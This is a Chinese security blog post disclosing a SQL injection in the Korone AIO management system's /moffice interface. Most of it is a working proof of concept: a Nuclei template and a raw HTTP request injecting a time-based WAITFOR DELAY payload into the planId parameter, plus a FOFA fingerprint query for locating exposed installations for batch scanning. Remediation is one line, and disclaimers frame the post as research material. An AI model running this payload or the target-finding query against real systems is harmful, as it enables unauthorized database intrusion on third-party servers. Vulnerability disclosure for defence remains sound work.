科荣AIO管理系统moffice接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】

admin 2024年7月10日18:35:41评论165 views字数 984阅读3分16秒阅读模式
免责声明:本文内容仅供技术学习参考,请勿用于违法破坏。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,与作者无关。如有侵权请联系删除

漏洞描述:

科荣AIO管理系统moffice接口处存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性,甚至获取对数据库的完全控制。

01

Nuclei POC

id: kerong-AIO-moffice-SQLinfo:  name: 科荣AIO管理系统moffice接口处存在SQL注入漏洞  author: kingkong  severity: high  metadata:    fofa-query: icon_hash="-638292089" || body="changeAccount('8000')"http:  - raw:      - |                      GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:3'--&sid=1 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0        Connection: close    matchers-condition: and    matchers:      - type: dsl        dsl:          - "duration>=3  && duration<=6 && status_code==200"

02

搜索语法

FOFA:icon_hash="-638292089" || body="changeAccount('8000')"

科荣AIO管理系统moffice接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】

界面如下

科荣AIO管理系统moffice接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】

03

漏洞复现

科荣AIO管理系统moffice接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】

漏洞检测POC

GET /moffice?op=showWorkPlan&planId=1%27;WAITFOR+DELAY+%270:0:3%27--&sid=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

neclei批量检测截图

科荣AIO管理系统moffice接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】

04

修复建议

更新当前系统至最新版

链接:
http://www.koronsoft.com/

原文始发于微信公众号(脚本小子):科荣AIO管理系统moffice接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日18:35:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   科荣AIO管理系统moffice接口处存在SQL注入漏洞【漏洞复现|附nuclei-POC】https://cn-sec.com/archives/2939135.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息